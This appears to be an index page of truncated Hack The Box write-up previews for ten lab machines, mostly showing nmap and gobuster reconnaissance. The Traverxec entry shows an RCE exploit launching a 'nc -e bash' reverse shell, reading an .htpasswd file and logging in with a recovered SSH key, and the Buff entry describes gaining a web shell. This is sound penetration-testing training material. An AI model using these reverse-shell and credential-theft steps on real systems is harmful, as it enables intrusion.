HTB Heist

$nmap -sC -sV -oA all -vv -p- $gobuster dir -u -w ~/tools/SecLists/Discovery/Web-Content/raft-medium-directories.txt -e $gobuster dir -u -w ~/tools/SecLists/Discovery/Web-Content/raft-large-files.txt -e -k php Accessing to There is a «Login as Guest» option. There is an «Attachment» link. The message talks about a Cisco Router. Hazard said to create a user account for him. So it should be a «hazard» username. Testing admin credentials we’ve just found. we need an

HTB Traceback

$nmap -A -T4 -p- Open ports: 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 80/tcp open http Apache httpd 2.4.29 Access to Can we assume that there is a Web-shell in this box? Let’s try to find out. $gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e With our usual wordlist, there aren’t interesting results. Let’s try a different one taking into account the comment of the main site that talked about web-shells… $gobuster dir

HTB Traverxec

$nmap -T4 -A -p- Open ports: 22/tcp open ssh OpenSSH 7.9p1 Debian 80/tcp open http nostromo 1.9.6 Nostromo v1.9.6 web server ( $searchsploit nostromo Our web server is vulnerable to an RCE… 🙂 $searchsploit -m 47837 $python 80 «nc -e bash 1234″$nc -lnvp 1234 whoami python3 -c «import pty;pty.spawn(‘/bin/bash’)» We are www-data, let’s enumerate a little bit. www-data@traverxec:/var/nostromo/conf$ ls -la www-data@traverxec:/var/nostromo/conf$ cat .htpasswd $chmod 600 david.key$ssh -i david.key david@

HTB Bastion

$nmap -A -p- -T4 Open ports: 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp

HTB Forest

$ forest nmap -T4 -A -p- Open ports: We have an Active Directory LDAP server Domain Controller: htb.local OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) Domain name: htb.local Forest name: htb.local FQDN: FOREST.htb.local To start with the box enumeration we can use JXplorer. JXplorer is a cross platform LDAP browser and editor. It is a standards compliant general purpose LDAP client that can be used

HTB Buff

$ nmap -A -T4 -p- -Pn $ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u -e Access to From this home site page: Access to There is a list of different projects. Here you will find this one: From this site, you can download the whole project. $ searchsploit Gym Management System 1.0 Using this exploit ( $ python2.7 C:\xampp\htdocs\gym\upload> whoami C:\xampp\htdocs\gym\upload> dir A web shell

HTB Curling

$ nmap -T4 -A -p- $ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u -e If we access to, we’ll find a Joomla login form. Accessing to, Based on the published post there are these users: Super User Floris Watching on the source code, there is a suspicious secret.txt file somewhere. This string seems to be encoded. Searching for: «linux decode string», Google give us the suggestion of

HTB Postman

$ nmap -A -p- -T4 Open ports: 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 6379/tcp open redis Redis key-value store 4.0.9 10000/tcp open http MiniServ 1.910 (Webmin httpd) $ gobuster dir -u -w Access to Access to Access to Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and

HTB Writeup

$ nmap -A -T4 -p- -sV Although nmap says port 80 is open, it also appears to be as tcpwrapped.What does it mean? Tcpwrapped refers to tcpwrapper, a host-based network access control program on Unix and Linux. When Nmap labels something tcpwrapped, it means that the behavior of the port is consistent with one that is protected by tcpwrapper. Specifically, it means that a full TCP handshake was completed,

HTB Irked

$ nmap -A -T4 -p- Access to According to Nmap’s results, we have open these ports related to UrealIRCd: 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 65534/tcp open irc UnrealIRCd (Admin email djmardov@irked.htb) As we have an IRC in this box let’s start trying to connect to it. $ sudo irssi 65534 According to this, we have a UnrealIRC version $ searchsploit unrealirc Exploiting UnrealIRC